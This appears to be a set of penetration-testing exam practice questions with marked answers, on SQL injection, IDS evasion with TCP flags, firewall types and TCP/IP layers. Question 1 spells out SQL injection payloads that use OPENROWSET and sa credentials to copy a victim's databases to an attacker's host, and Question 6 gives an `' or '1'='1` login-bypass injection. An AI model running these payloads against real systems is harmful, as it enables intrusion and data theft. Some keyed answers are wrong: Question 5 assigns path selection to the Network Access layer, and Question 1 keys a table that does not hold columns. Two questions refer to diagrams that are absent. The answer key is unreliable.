A penetration tester tries to transfer the database from the target machine to a different machine. For this, he uses OPENROWSET to link the target database to his own database, replicates the database structure, and transfers the data to his machine via a connection to the remote machine on port 80.
The query he used to transfer databases was:
'; insert into OPENROWSET ('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases -
The query he used to transfer table 1 was:
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1') select * from database..table1 -
What query does he need in order to transfer the column?
A. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;','select * from mydatabase..hacked_syscolumns') select * from user_tables.dbo.syscolumns -
B. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;','select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns -
C. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;','select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows -
D. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;','select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables -
Correct answer: D
Question 2:
Identify the person who will lead the penetration-testing project and be the client point of contact.
A. Chief Penetration Tester
B. Application Penetration Tester
C. Database Penetration Tester
D. Policy Penetration Tester
Correct answer: A
Question 3:
Due to illegal inputs, various types of TCP stacks respond in a different manner. Some IDSs do not take into account the TCP protocol's urgency feature, which could allow testers to evade the IDS.
A penetration tester needs to try different combinations of TCP flags (e.g. none, SYN/FIN, SYN/RST, SYN/FIN/ACK, SYN/RST/ACK, and All Flags) to test the IDS.
Which of the following TCP flag combinations combines the problem of initiation, midstream, and termination flags with the PSH and URG?
A. SYN/RST/ACK
B. SYN/FIN
C. SYN/FIN/ACK
D. All Flags
Correct answer: D
Question 4:
Identify the type of firewall represented in the diagram below:
A. Circuit level gateway
B. Packet filter
C. Application level gateway
D. Stateful multilayer inspection firewall
Correct answer: C
Question 5:
The TCP/IP model is a framework for the Internet Protocol suite of computer network protocols that defines the communication in an IP-based network. It provides end-to-end connectivity specifying how data should be formatted, addressed, transmitted, routed and received at the destination. This functionality has been organized into four abstraction layers which are used to sort all related protocols according to the scope of networking involved.
Which of the following TCP/IP layers selects the best path through the network for packets to travel?
A. Internet layer
B. Application layer
C. Network Access layer
D. Transport layer
Correct answer: C
Question 6:
A WHERE clause in SQL specifies that a SQL Data Manipulation Language (DML) statement should only affect rows that meet specified criteria. The criteria are expressed in the form of predicates. WHERE clauses are not mandatory clauses of SQL DML statements, but can be used to limit the number of rows affected by a SQL DML statement or returned by a query.
A pen tester is trying to gain access to a database by inserting exploited query statements with a WHERE clause. The pen tester wants to retrieve all the entries from the database using the WHERE clause from a particular table (e.g. StudentTable).
What query does he need to write to retrieve the information?
A. RETRIVE * FROM StudentTable WHERE roll_number = 1'#
B. DUMP * FROM StudentTable WHERE roll_number = 1 AND 1=1-
C. EXTRACT* FROM StudentTable WHERE roll_number = 1 order by 1000
D. SELECT * FROM StudentTable WHERE roll_number = '' or '1' = '1'
Correct answer: D
Question 7:
The amount of data stored in organizational databases has increased rapidly in recent years due to the rapid advancement of information technologies. A high percentage of these data is sensitive, private and critical to the organizations, their clients and partners.
Therefore, databases are usually installed behind internal firewalls, protected with intrusion detection mechanisms and accessed only by applications. To access a database, users have to connect to one of these applications and submit queries through them to the database. The threat to databases arises when these applications do not behave properly and construct these queries without sanitizing user inputs first.
Identify the injection attack represented in the diagram below:
A. XPath Injection Attack
B. LDAP Injection Attack
C. Frame Injection Attack
D. SOAP Injection Attack
Correct answer: B